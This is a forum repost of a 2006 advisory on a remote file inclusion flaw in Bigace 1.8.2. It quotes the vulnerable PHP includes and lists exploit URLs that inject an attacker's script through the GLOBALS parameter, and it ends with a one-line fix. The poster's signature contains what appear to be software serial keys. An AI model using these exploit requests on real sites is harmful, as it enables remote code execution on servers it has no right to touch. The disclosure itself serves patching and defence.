‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[Web Apps]Bigace 1.8.2 (GLOBALS) Remote File Inclusion

血色眼泪

萌要素

LUPA贵宾

Rank: 8Rank: 8

优秀斑竹奖 杰出贡献奖

1# 发表于 2006-8-29 12:55  只看该作者

[Web Apps]Bigace 1.8.2 (GLOBALS) Remote File Inclusion

  Author : Vampire

Location : Iran - Tehran

HomePage : http://www.hackerz.ir

Email : Vampire_chiristof[at]yahoo[dot]com

Critical Level : Dangerous

------------------------------------------------------------------------

---------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bigace

version : 1.8.2

URL : http://Bigace.sourceforge.net

------------------------------------------------------------------------

---------------

Vulnerability:

~~~~~~~~~~~~~

in download.cmd.php , admin.cmd.php , upload_form.php We Found Vulnerability Script

----------------------------------------admin.cmd.php-------------------
----

---------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'styling.php');

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'functions.inc.php');

include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');

?>

...

----------------------------------------download.cmd.php----------------
-------

---------------

....

<?php

include_once($GLOBALS['_BIGACE']['DIR']['libs'].'io.inc.php');

?>

...

----------------------------------------upload_form.php-----------------
------

---------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants
.php');

?>

...

----------------------------------------item_main.php-------------------
----

---------------

....

<?php

require_once($GLOBALS['_BIGACE']['DIR']['admin'].'include/mode_constants
.php');

?>

...

Exploit:

~~~~~~~

http://www.target.com/[Bigace]/system/admin/include/item_main.php?GLOBAL
S=[Evil Script]

http://www.target.com/[Bigace]/system/admin/include/upload_form.php?GLOB
ALS=[Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[
Evil Script]

http://www.target.com/[Bigace]/system/command/download.cmd.php?GLOBALS=[
Evil Script]

http://www.target.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evi
l Script]

Solution:

~~~~~~~~

Sanitize Variabel $GLOBALS in download.cmd.php , admin.cmd.php , item_main.php , upload_form.php

------------------------------------------------------------------------

----------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Cephexin , Sh3ll , MFOX , Alijbs and All Real Hackers
很多时候
你我之间那不可逾越的天涯
仅仅只有咫尺大小
用瑞星?还不如用智慧星!
2V97-9DKN-F9HC-JCJE
KTB9-N7BP-CR8N-49VX
X1OC2N0GJ1H51W84

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题